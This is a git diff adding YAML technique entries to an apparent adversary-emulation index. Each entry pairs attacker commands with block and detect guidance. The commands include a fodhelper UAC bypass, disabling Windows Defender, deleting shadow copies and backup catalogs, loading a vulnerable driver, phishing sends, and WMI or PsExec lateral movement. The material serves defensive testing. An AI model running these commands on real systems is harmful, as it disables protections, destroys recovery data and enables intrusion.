+description: Load a legitimate and signed kernel driver that is vulnerable to exploitation. Refer to projects like KDU (https://github.com/hfiref0x/KDU/) for potential vulnerable drivers to use. Vulnerable, signed drivers provide a privileged (kernel) execution mechanism to attackers, allowing them to bypass security controls they couldn't otherwise bypass, such as by killing protected processes.
+platforms:
+- windows
+guidance:
+- "(example) cmd> \nsc.exe create {{ name }} type= kernel start= demand error= normal binpath= c:\\windows\\System32\\Drivers\\{{ sys_file }} displayname= {{ name }}\nsc.exe start {{ name }}\n"
+block:
+- Use built-in Windows security features like HVCI and WDAC to block loading of drivers based on hash and/or signature characteristics.
+- https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules
+- https://www.loldrivers.io/
+- Anomalous driver load blocked by endpoint security tool
+detect:
+- Anomalous driver load detected by endpoint security tool or in the SIEM via telemetry data, such as Sysmon ID 6
+controls:
+- Hardening
+- Endpoint Protection
+metadata:
+  id: 327db68c-178b-4e3c-8f2d-12d91bc49fe0
+  tid: T1014
+  tactic: TA0005
+  x_vectr_id: 327db68c-178b-4e3c-8f2d-12d91bc49fe0
+  isv: 1
diff --git a/ot-index-2024/techniques/DefenseEvasion/8c06191e-8c03-4b97-8c18-e28cde39fda5.yml b/ot-index-2024/techniques/DefenseEvasion/8c06191e-8c03-4b97-8c18-e28cde39fda5.yml
new file mode 100644
index 0000000..77a3868
--- /dev/null
+++ b/ot-index-2024/techniques/DefenseEvasion/8c06191e-8c03-4b97-8c18-e28cde39fda5.yml
@@ -0,0 +1,25 @@
+name: Bypass User Account Control (UAC) via fodhelper
+description: Bypass user account control (UAC) to move to a high-integrity execution context via fodhelper.exe and a Registry modification
+platforms:
+- windows
+guidance:
+- cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /f
+- cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /d "C:\windows\system32\cmd.exe" /f
+- cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /d "" /f
+- cmd> c:\windows\system32\fodhelper.exe
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Suspicious Windows Registry access/modifications detected in the SIEM using telemetry (e.g. Windows Advanced Audit events, endpoint security tool logs)
+controls:
+- SIEM
+- Endpoint Protection
+metadata:
+  id: 8c06191e-8c03-4b97-8c18-e28cde39fda5
+  tid: T1548.002
+  tactic: TA0004
+  x_references:
+  - https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/
+  x_vectr_id: 8c06191e-8c03-4b97-8c18-e28cde39fda5
+  isv: 1
diff --git a/ot-index-2024/techniques/DefenseEvasion/940be4b6-6081-4808-ab64-aceadfeb3792.yml b/ot-index-2024/techniques/DefenseEvasion/940be4b6-6081-4808-ab64-aceadfeb3792.yml
new file mode 100644
index 0000000..9574d4f
--- /dev/null
+++ b/ot-index-2024/techniques/DefenseEvasion/940be4b6-6081-4808-ab64-aceadfeb3792.yml
@@ -0,0 +1,20 @@
+name: DLL execution using Rundll32
+description: Execute a malicious DLL's function directly using rundll32
+platforms:
+- windows
+guidance:
+- cmd> rundll32 {{ dll }},{{ export }} [{{ args }}]
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Payload on disk deleted/quarantined by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+  id: 940be4b6-6081-4808-ab64-aceadfeb3792
+  tid: T1218.011
+  tactic: TA0005
+  x_vectr_id: 940be4b6-6081-4808-ab64-aceadfeb3792
+  isv: 1
diff --git a/ot-index-2024/techniques/DefenseEvasion/cb3ea139-979c-438a-9cf7-611b985f4d61.yml b/ot-index-2024/techniques/DefenseEvasion/cb3ea139-979c-438a-9cf7-611b985f4d61.yml
new file mode 100644
index 0000000..66ceb94
--- /dev/null
+++ b/ot-index-2024/techniques/DefenseEvasion/cb3ea139-979c-438a-9cf7-611b985f4d61.yml
@@ -0,0 +1,20 @@
+name: Disable Windows Defender via PowerShell
+description: Use PowerShell's Set-MpPreference to disable Windows Defender
+platforms:
+- windows
+guidance:
+- PS> Set-MpPreference -DisableBehaviorMonitoring $true
+- PS> Set-MpPreference -DisableRealtimeMonitoring $true
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- "Changes to Defender's running state are detected using Defender Event Log events (e.g. 5001 for being disabled, 5004 and 5007 for being changed; full list: https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus)"
+controls:
+- Endpoint Protection
+metadata:
+  id: cb3ea139-979c-438a-9cf7-611b985f4d61
+  tid: T1562.001
+  tactic: TA0005
+  x_vectr_id: cb3ea139-979c-438a-9cf7-611b985f4d61
+  isv: 1
diff --git a/ot-index-2024/techniques/DefenseEvasion/cbd9070f-03fa-455f-af46-99e8d41146ac.yml b/ot-index-2024/techniques/DefenseEvasion/cbd9070f-03fa-455f-af46-99e8d41146ac.yml
new file mode 100644
index 0000000..df9cb79
--- /dev/null
+++ b/ot-index-2024/techniques/DefenseEvasion/cbd9070f-03fa-455f-af46-99e8d41146ac.yml
@@ -0,0 +1,16 @@
+name: Modify identity policy in IdP
+description: Modify an IdP policy to be more permissive for authentication. For example, disable an Azure AD conditional access policy's MFA requirement.
+platforms:
+guidance:
+block:
+- ''
+detect:
+- Monitor for policy modifications from IdP control plane telemetry and look for anomalous changes, such as those performed by unexpected principals or changes occuring outside of expected business processes
+controls:
+- SIEM
+metadata:
+  id: cbd9070f-03fa-455f-af46-99e8d41146ac
+  tid: T1484
+  tactic: TA0003
+  x_vectr_id: cbd9070f-03fa-455f-af46-99e8d41146ac
+  isv: 1
diff --git a/ot-index-2024/techniques/Discovery/672f8861-c914-4f58-b861-5107ce19f61c.yml b/ot-index-2024/techniques/Discovery/672f8861-c914-4f58-b861-5107ce19f61c.yml
new file mode 100644
index 0000000..b1e1235
--- /dev/null
+++ b/ot-index-2024/techniques/Discovery/672f8861-c914-4f58-b861-5107ce19f61c.yml
@@ -0,0 +1,22 @@
+name: BloodHound DC enumeration
+description: Use BloodHound/SharpHound to perform enumeration of domain resources against a domain controller
+platforms:
+guidance:
+- cmd> SharpHound.exe -c DcOnly
+block:
+- ''
+detect:
+- Windows enumeration activities detected from large amount of network traffic (SMB, ARP, SAMR, etc) via UEBA-like or network monitoring tools
+- Enable object logging for directory services via Group Policy Advanced Audit then configure a SACL on Active Directory objects. Trigger an alert when multiple (high-value) objects are accessed by a single source in a short period using object access logs for the directory service objects (Evevnt ID 4656, 4663)
+- https://blog.blacklanternsecurity.com/p/detecting-ldap-recoannaissance
+controls:
+- SIEM
+- Identity Threat Protection
+metadata:
+  id: 672f8861-c914-4f58-b861-5107ce19f61c
+  tid: T1087.002
+  tactic: TA0007
+  x_tools:
+  - https://github.com/BloodHoundAD/SharpHound
+  x_vectr_id: 672f8861-c914-4f58-b861-5107ce19f61c
+  isv: 1
diff --git a/ot-index-2024/techniques/Discovery/7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2.yml b/ot-index-2024/techniques/Discovery/7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2.yml
new file mode 100644
index 0000000..0502f98
--- /dev/null
+++ b/ot-index-2024/techniques/Discovery/7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2.yml
@@ -0,0 +1,23 @@
+name: Enumerate domain groups and users using net
+description: Enumerate domain users and domain groups using the builtin net.exe
+platforms:
+- windows
+guidance:
+- cmd> net user /domain
+- cmd> net group /domain
+- cmd> net group "Domain Admins" /domain
+- cmd> net group "Domain Computers" /domain
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible.
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+  id: 7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2
+  tid: T1087.002
+  tactic: TA0007
+  x_vectr_id: 7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2
+  isv: 1
diff --git a/ot-index-2024/techniques/Discovery/bc85f11b-e481-4afb-a5f5-db26e5c07433.yml b/ot-index-2024/techniques/Discovery/bc85f11b-e481-4afb-a5f5-db26e5c07433.yml
new file mode 100644
index 0000000..e73f4ce
--- /dev/null
+++ b/ot-index-2024/techniques/Discovery/bc85f11b-e481-4afb-a5f5-db26e5c07433.yml
@@ -0,0 +1,20 @@
+name: Domain Controller discovery via nltest
+description: Use nltest.exe to identify domain controllers in the domain
+platforms:
+- windows
+guidance:
+- cmd> nltest.exe /dclist:{{ domain }}
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible.
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+  id: bc85f11b-e481-4afb-a5f5-db26e5c07433
+  tid: T1018
+  tactic: TA0007
+  x_vectr_id: bc85f11b-e481-4afb-a5f5-db26e5c07433
+  isv: 1
diff --git a/ot-index-2024/techniques/Execution/a7134d71-dc49-41a8-a309-ec520c96a089.yml b/ot-index-2024/techniques/Execution/a7134d71-dc49-41a8-a309-ec520c96a089.yml
new file mode 100644
index 0000000..867c552
--- /dev/null
+++ b/ot-index-2024/techniques/Execution/a7134d71-dc49-41a8-a309-ec520c96a089.yml
@@ -0,0 +1,22 @@
+name: Macro - Remote Template
+description: Execute a malicious Office document on the endpoint that will load a macro stored in a remote template document
+platforms:
+- windows
+guidance:
+block:
+- Macro execution is blocked by GPO policy
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Payload on disk deleted/quarantined by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Payload on disk triggers an alert with endpoint security tool
+controls:
+- Endpoint Protection
+- Hardening
+- SIEM
+metadata:
+  id: a7134d71-dc49-41a8-a309-ec520c96a089
+  tid: T1221
+  tactic: TA0005
+  x_vectr_id: a7134d71-dc49-41a8-a309-ec520c96a089
+  isv: 1
diff --git a/ot-index-2024/techniques/Exfiltration/7d63d9d1-0bb4-41b5-9fe2-785bad419860.yml b/ot-index-2024/techniques/Exfiltration/7d63d9d1-0bb4-41b5-9fe2-785bad419860.yml
new file mode 100644
index 0000000..77e983d
--- /dev/null
+++ b/ot-index-2024/techniques/Exfiltration/7d63d9d1-0bb4-41b5-9fe2-785bad419860.yml
@@ -0,0 +1,19 @@
+name: Extract sensitive data over HTTP
+description: Extract data from the network over HTTP tcp/80 to an external host or IP.
+platforms:
+guidance:
+- http://dlptest.com/http-post/
+block:
+- Sensitive data sent over the network is blocked by network DLP tool
+detect:
+- Sensitive data sent over the network is detected by network DLP tool
+controls:
+- Firewall
+- DLP
+- Web Gateway
+metadata:
+  id: 7d63d9d1-0bb4-41b5-9fe2-785bad419860
+  tid: T1048.003
+  tactic: TA0010
+  x_vectr_id: 7d63d9d1-0bb4-41b5-9fe2-785bad419860
+  isv: 1
diff --git a/ot-index-2024/techniques/Exfiltration/9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66.yml b/ot-index-2024/techniques/Exfiltration/9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66.yml
new file mode 100644
index 0000000..b807191
--- /dev/null
+++ b/ot-index-2024/techniques/Exfiltration/9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66.yml
@@ -0,0 +1,19 @@
+name: Extract data to cloud storage service
+description: Extract data from the internal network to a cloud storage service like MEGA, Google Drive, or Box
+platforms:
+guidance:
+block:
+- Sensitive data sent over the network is blocked by network DLP tool
+- Network security tool detects connection to domain based on category from proxy or DNS
+detect:
+- Sensitive data sent over the network is detected by network DLP tool
+controls:
+- Firewall
+- DLP
+- Web Gateway
+metadata:
+  id: 9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66
+  tid: T1567.002
+  tactic: TA0010
+  x_vectr_id: 9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66
+  isv: 1
diff --git a/ot-index-2024/techniques/Exfiltration/b48fa856-d004-4d5a-918f-d9429a9cd8e3.yml b/ot-index-2024/techniques/Exfiltration/b48fa856-d004-4d5a-918f-d9429a9cd8e3.yml
new file mode 100644
index 0000000..3c2f885
--- /dev/null
+++ b/ot-index-2024/techniques/Exfiltration/b48fa856-d004-4d5a-918f-d9429a9cd8e3.yml
@@ -0,0 +1,20 @@
+name: Extract sensitive data over HTTP C2
+description: Extract data from the network via an HTTP C2 channel over tcp/80 to external host or IP
+platforms:
+guidance:
+- implant> download {{ file }}
+block:
+- Sensitive data sent over the network is blocked by network DLP tool
+- C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool
+detect:
+- C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool
+controls:
+- Firewall
+- DLP
+- Web Gateway
+metadata:
+  id: b48fa856-d004-4d5a-918f-d9429a9cd8e3
+  tid: T1041
+  tactic: TA0010
+  x_vectr_id: b48fa856-d004-4d5a-918f-d9429a9cd8e3
+  isv: 1
diff --git a/ot-index-2024/techniques/Impact/31d4a02d-4a66-4740-a9c4-8814319fd5c4.yml b/ot-index-2024/techniques/Impact/31d4a02d-4a66-4740-a9c4-8814319fd5c4.yml
new file mode 100644
index 0000000..2dbf5f4
--- /dev/null
+++ b/ot-index-2024/techniques/Impact/31d4a02d-4a66-4740-a9c4-8814319fd5c4.yml
@@ -0,0 +1,20 @@
+name: Delete shadows with vssadmin.exe
+description: Delete volume shadow copies on the host to inhibit file system recovery
+platforms:
+- windows
+guidance:
+- CMD> vssadmin.exe delete shadows /all /quiet
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Suspicious Volume Shadow Service use detected in the SIEM using telemetry
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+  id: 31d4a02d-4a66-4740-a9c4-8814319fd5c4
+  tid: T1490
+  tactic: TA0040
+  x_vectr_id: 31d4a02d-4a66-4740-a9c4-8814319fd5c4
+  isv: 1
diff --git a/ot-index-2024/techniques/Impact/45591791-541b-4a27-bda9-75e6d78a66f4.yml b/ot-index-2024/techniques/Impact/45591791-541b-4a27-bda9-75e6d78a66f4.yml
new file mode 100644
index 0000000..4e63384
--- /dev/null
+++ b/ot-index-2024/techniques/Impact/45591791-541b-4a27-bda9-75e6d78a66f4.yml
@@ -0,0 +1,16 @@
+name: Modify group policy object
+description: Modify a domain group policy object. This can be used for activities like persisting access to the environment, disabling security controls, and executing ransomware on domain systems.
+platforms:
+guidance:
+block:
+- ''
+detect:
+- Configure auditing on group policy objects then look for anomalous changes, such as those performed by unexpected principals or changes occuring outside of expected business processes
+controls:
+- SIEM
+metadata:
+  id: 45591791-541b-4a27-bda9-75e6d78a66f4
+  tid: T1484.001
+  tactic: TA0005
+  x_vectr_id: 45591791-541b-4a27-bda9-75e6d78a66f4
+  isv: 1
diff --git a/ot-index-2024/techniques/Impact/72224b97-93d1-4087-8b82-6b4342bf2e09.yml b/ot-index-2024/techniques/Impact/72224b97-93d1-4087-8b82-6b4342bf2e09.yml
new file mode 100644
index 0000000..f6c2e88
--- /dev/null
+++ b/ot-index-2024/techniques/Impact/72224b97-93d1-4087-8b82-6b4342bf2e09.yml
@@ -0,0 +1,20 @@
+name: Encrypt a large amount of files
+description: Encrypt a large amount of files on the endpoint to simulate ransomware
+platforms:
+guidance:
+- cmd> coldcryptor.exe run {{ extension }}
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Detect common ransomware extensions using file system telemetry
+controls:
+- Endpoint Protection
+metadata:
+  id: 72224b97-93d1-4087-8b82-6b4342bf2e09
+  tid: T1486
+  tactic: TA0040
+  x_tools:
+  - https://github.com/2XXE-SRA/payload_resources/tree/master/coldencryptor
+  x_vectr_id: 72224b97-93d1-4087-8b82-6b4342bf2e09
+  isv: 1
diff --git a/ot-index-2024/techniques/Impact/99c34e6d-c82a-48b8-88ea-7453f98ee561.yml b/ot-index-2024/techniques/Impact/99c34e6d-c82a-48b8-88ea-7453f98ee561.yml
new file mode 100644
index 0000000..1cd582d
--- /dev/null
+++ b/ot-index-2024/techniques/Impact/99c34e6d-c82a-48b8-88ea-7453f98ee561.yml
@@ -0,0 +1,20 @@
+name: Delete backup catalogs with wbadmin.exe
+description: Delete native Windows backups
+platforms:
+- windows
+guidance:
+- CMD> wbadmin delete catalog -quiet
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible.
+controls:
+- SIEM
+- Endpoint Protection
+metadata:
+  id: 99c34e6d-c82a-48b8-88ea-7453f98ee561
+  tid: T1490
+  tactic: TA0040
+  x_vectr_id: 99c34e6d-c82a-48b8-88ea-7453f98ee561
+  isv: 1
diff --git a/ot-index-2024/techniques/InitialAccess/0a348365-1f35-445c-baf0-a6687ddc3f40.yml b/ot-index-2024/techniques/InitialAccess/0a348365-1f35-445c-baf0-a6687ddc3f40.yml
new file mode 100644
index 0000000..88fa6ed
--- /dev/null
+++ b/ot-index-2024/techniques/InitialAccess/0a348365-1f35-445c-baf0-a6687ddc3f40.yml
@@ -0,0 +1,17 @@
+name: Attachment - Macro
+description: Send a spearphishing attachment containing a malicious macro payload to a target inbox
+platforms:
+guidance:
+- ps> Send-MailMessage -SmtpServer {{ maildomain }} -UseSSL -BodyAsHTML -Subject {{ subject }} -Body {{ body }} -To {{ target }} -From {{ from }} -Attachments {{ attachment }}
+block:
+- Malicious email blocked/quarantined or attachment inside email stripped by email gateway
+detect:
+- Malicious email alerted on by email gateway
+controls:
+- Mail Gateway
+metadata:
+  id: 0a348365-1f35-445c-baf0-a6687ddc3f40
+  tid: T1566.001
+  tactic: TA0001
+  x_vectr_id: 0a348365-1f35-445c-baf0-a6687ddc3f40
+  isv: 1
diff --git a/ot-index-2024/techniques/InitialAccess/98551e7e-1cb8-47c0-a27d-772ddd700617.yml b/ot-index-2024/techniques/InitialAccess/98551e7e-1cb8-47c0-a27d-772ddd700617.yml
new file mode 100644
index 0000000..c65d238
--- /dev/null
+++ b/ot-index-2024/techniques/InitialAccess/98551e7e-1cb8-47c0-a27d-772ddd700617.yml
@@ -0,0 +1,17 @@
+name: Link - Zipped DLL via sharing
+description: Send a link to a zipped DLL payload stored on a cloud storage service like Google Drive by using the sharing features of that service
+platforms:
+guidance:
+- ps> Send-MailMessage -SmtpServer {{ maildomain }} -UseSSL -BodyAsHTML -Subject {{ subject }} -Body {{ body }} -To {{ target }} -From {{ from }} -Attachments {{ attachment }}
+block:
+- Malicious email blocked/quarantined or link inside email rewritten/stripped by email gateway
+detect:
+- Malicious email alerted on by email gateway
+controls:
+- Mail Gateway
+metadata:
+  id: 98551e7e-1cb8-47c0-a27d-772ddd700617
+  tid: T1566.002
+  tactic: TA0001
+  x_vectr_id: 98551e7e-1cb8-47c0-a27d-772ddd700617
+  isv: 1
diff --git a/ot-index-2024/techniques/InitialAccess/ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7.yml b/ot-index-2024/techniques/InitialAccess/ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7.yml
new file mode 100644
index 0000000..daf292b
--- /dev/null
+++ b/ot-index-2024/techniques/InitialAccess/ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7.yml
@@ -0,0 +1,16 @@
+name: Prompt a user with multiple MFA requests
+description: Using valid credentials for a user, prompt that user with multiple MFA requests in a short period of time in order to induce them to accept the prompt.
+platforms:
+guidance:
+block:
+- Prevent sign-ins from users with anomalous login characteristics, such as an unknown geolocation or device fingerprint
+detect:
+- Baseline MFA requests for users using authentication logs then generate alerts for instances where the amount of MFA requests for a user significantly exceeds the baseline within a short time period (e.g. <1 hour).
+controls:
+- IdP
+metadata:
+  id: ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7
+  tid: T1621
+  tactic: TA0006
+  x_vectr_id: ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7
+  isv: 1
diff --git a/ot-index-2024/techniques/InitialAccess/ccf6d4a6-879e-4a7c-a2ae-6273437fc658.yml b/ot-index-2024/techniques/InitialAccess/ccf6d4a6-879e-4a7c-a2ae-6273437fc658.yml
new file mode 100644
index 0000000..1eae23d
--- /dev/null
+++ b/ot-index-2024/techniques/InitialAccess/ccf6d4a6-879e-4a7c-a2ae-6273437fc658.yml
@@ -0,0 +1,17 @@
+name: Attachment - ISO
+description: Send phishing email to victim containing an ISO attachment. ISO files can be used to bypass mark-of-the-web restrictions.
+platforms:
+guidance:
+- PS> Send-MailMessage -SmtpServer {{ maildomain }} -UseSSL -BodyAsHTML -Subject {{ subject }} -Body {{ body }} -To {{ target }} -From {{ noreply@maildomain }} -Attachments {{ attachment }}
+block:
+- Malicious email blocked/quarantined or link inside email rewritten/stripped by email gateway
+detect:
+- Malicious email alerted on by email gateway
+controls:
+- Mail Gateway
+metadata:
+  id: ccf6d4a6-879e-4a7c-a2ae-6273437fc658
+  tid: T1566.001
+  tactic: TA0001
+  x_vectr_id: ccf6d4a6-879e-4a7c-a2ae-6273437fc658
+  isv: 1
diff --git a/ot-index-2024/techniques/LateralMovement/0735ef7e-438f-4fc9-a656-7d11d73fbc61.yml b/ot-index-2024/techniques/LateralMovement/0735ef7e-438f-4fc9-a656-7d11d73fbc61.yml
new file mode 100644
index 0000000..775b96d
--- /dev/null
+++ b/ot-index-2024/techniques/LateralMovement/0735ef7e-438f-4fc9-a656-7d11d73fbc61.yml
@@ -0,0 +1,20 @@
+name: Lateral Movement via RDP
+description: Perform an interactive logons to a Windows system via RDP
+platforms:
+- windows
+guidance:
+- CMD> mstsc /v:{{ target }}
+block:
+- Host-based firewalls prevent direct communications over common ports/protocols
+detect:
+- Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+controls:
+- SIEM
+- Identity Threat Protection
+- Hardening
+metadata:
+  id: 0735ef7e-438f-4fc9-a656-7d11d73fbc61
+  tid: T1021.001
+  tactic: TA0008
+  x_vectr_id: 0735ef7e-438f-4fc9-a656-7d11d73fbc61
+  isv: 1
diff --git a/ot-index-2024/techniques/LateralMovement/3c337f53-d086-4f2f-818a-08fb1a1c5f79.yml b/ot-index-2024/techniques/LateralMovement/3c337f53-d086-4f2f-818a-08fb1a1c5f79.yml
new file mode 100644
index 0000000..807596c
--- /dev/null
+++ b/ot-index-2024/techniques/LateralMovement/3c337f53-d086-4f2f-818a-08fb1a1c5f79.yml
@@ -0,0 +1,23 @@
+name: Lateral Movement via WMI
+description: Move to another system by using Windows Management Instrumentation (WMI) to spawn a process on that target system
+platforms:
+- windows
+guidance:
+- CMD> wmic /node:"{{ target }}" process call create "{{ command }}"
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Host-based firewalls prevent direct communications over common ports/protocols
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+controls:
+- Endpoint Protection
+- SIEM
+- Identity Threat Protection
+- Hardening
+metadata:
+  id: 3c337f53-d086-4f2f-818a-08fb1a1c5f79
+  tid: T1021.003
+  tactic: TA0008
+  x_vectr_id: 3c337f53-d086-4f2f-818a-08fb1a1c5f79
+  isv: 1
diff --git a/ot-index-2024/techniques/LateralMovement/9b5396f2-6e4a-498a-995e-47e48a99bf76.yml b/ot-index-2024/techniques/LateralMovement/9b5396f2-6e4a-498a-995e-47e48a99bf76.yml
new file mode 100644
index 0000000..508dc52
--- /dev/null
+++ b/ot-index-2024/techniques/LateralMovement/9b5396f2-6e4a-498a-995e-47e48a99bf76.yml
@@ -0,0 +1,24 @@
+name: Lateral Movement via PsExec
+description: Move to another system by creating a service remotely via Sysinternals PsExec
+platforms:
+- windows
+guidance:
+- CMD> psexec -s \{{ target }} {{ command }}
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Host-based firewalls prevent direct communications over common ports/protocols
+- Remote access to the service control manager is blocked by a DACL, preventing service creation by remote users
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+controls:
+- Endpoint Protection
+- SIEM
+- Identity Threat Protection
+- Hardening
+metadata:
+  id: 9b5396f2-6e4a-498a-995e-47e48a99bf76
+  tid: T1021.002
+  tactic: TA0008
+  x_vectr_id: 9b5396f2-6e4a-498a-995e-47e48a99bf76
+  isv: 1
diff --git a/ot-index-2024/techniques/OT/0abf446d-3422-4b78-a029-a3485be7be2f.yml b/ot-index-2024/techniques/OT/0abf446d-3422-4b78-a029-a3485be7be2f.yml
new file mode 100644
index 0000000..c7c2a4e
--- /dev/null
+++ b/ot-index-2024/techniques/OT/0abf446d-3422-4b78-a029-a3485be7be2f.yml
@@ -0,0 +1,18 @@
+name: Lateral movement via remote service to OT system
+description: Move laterally to another system using a remote service (e.g. SSH, RDP)
+platforms:
+guidance:
+block:
+- ''
+detect:
+- Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+controls:
+- Endpoint Protection
+- SIEM
+- Identity Threat Protection
+metadata:
+  id: 0abf446d-3422-4b78-a029-a3485be7be2f
+  tid: T1021
+  tactic: TA0008
+  x_vectr_id: 0abf446d-3422-4b78-a029-a3485be7be2f
+  isv: 1
diff --git a/ot-index-2024/techniques/OT/3ac5c6b7-aa22-4359-9506-c675391c8b63.yml b/ot-index-2024/techniques/OT/3ac5c6b7-aa22-4359-9506-c675391c8b63.yml
new file mode 100644
index 0000000..1fbba96
--- /dev/null
+++ b/ot-index-2024/techniques/OT/3ac5c6b7-aa22-4359-9506-c675391c8b63.yml
@@ -0,0 +1,20 @@
+name: Replay PCAP for Triton
+description: Replay a packet capture of a dangerous Triton malware to simulate the traffic for passive OT security controls
+platforms:
+guidance:
+- shell> tcpreplay -i {{ interface }} {{ pcap_file }}
+block:
+- ''
+detect:
+- Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+- Passive network security sensors detect malicious network traffic
+controls:
+- Endpoint Protection
+- SIEM
+- ID/PS
+metadata:
+  id: 3ac5c6b7-aa22-4359-9506-c675391c8b63
+  tid: T1021
+  tactic: TA0008
+  x_vectr_id: 3ac5c6b7-aa22-4359-9506-c675391c8b63
+  isv: 1
diff --git a/ot-index-2024/techniques/OT/594e3a9f-82c9-4c99-a535-9379d69d2c3b.yml b/ot-index-2024/techniques/OT/594e3a9f-82c9-4c99-a535-9379d69d2c3b.yml
new file mode 100644
index 0000000..1f1a6f3
--- /dev/null
+++ b/ot-index-2024/techniques/OT/594e3a9f-82c9-4c99-a535-9379d69d2c3b.yml
@@ -0,0 +1,18 @@
+name: Transfer tool remotely to OT target
+description: Copy a payload to a remote target
+platforms:
+guidance:
+block:
+- Host-based firewalls prevent direct communications over common ports/protocols
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+  id: 594e3a9f-82c9-4c99-a535-9379d69d2c3b
+  tid: T1570
+  tactic: TA0008
+  x_vectr_id: 594e3a9f-82c9-4c99-a535-9379d69d2c3b
+  isv: 1
diff --git a/ot-index-2024/techniques/OT/6652690f-4b0d-4677-90b9-6a4fe3282ed4.yml b/ot-index-2024/techniques/OT/6652690f-4b0d-4677-90b9-6a4fe3282ed4.yml
new file mode 100644
index 0000000..eba50d3
--- /dev/null
+++ b/ot-index-2024/techniques/OT/6652690f-4b0d-4677-90b9-6a4fe3282ed4.yml
@@ -0,0 +1,20 @@
+name: Internal port scan against OT network
+description: Run internal port scan to probe for interesting OT-specific ports
+platforms:
+guidance:
+- shell> nmap -n -v --scan-delay 1 --open -Pn -sT -p 20000,44818,1089-1091,102,502,4840,80,443,34962-34964,4000 -oA {{ outfiles_name }} {{ cidr }}
+block:
+- Network security controls block source generating a large volume of connection requests
+detect:
+- Network security controls or the SIEM detect a source generating a large volume of connection requests by network traffic logs like switch logs and flow logs
+controls:
+- Firewall
+- ID/PS
+metadata:
+  id: 6652690f-4b0d-4677-90b9-6a4fe3282ed4
+  tid: T1046
+  tactic: TA0007
+  x_references:
+  - https://github.com/ITI/ICS-Security-Tools/blob/master/protocols/PORTS.md
+  x_vectr_id: 6652690f-4b0d-4677-90b9-6a4fe3282ed4
+  isv: 1
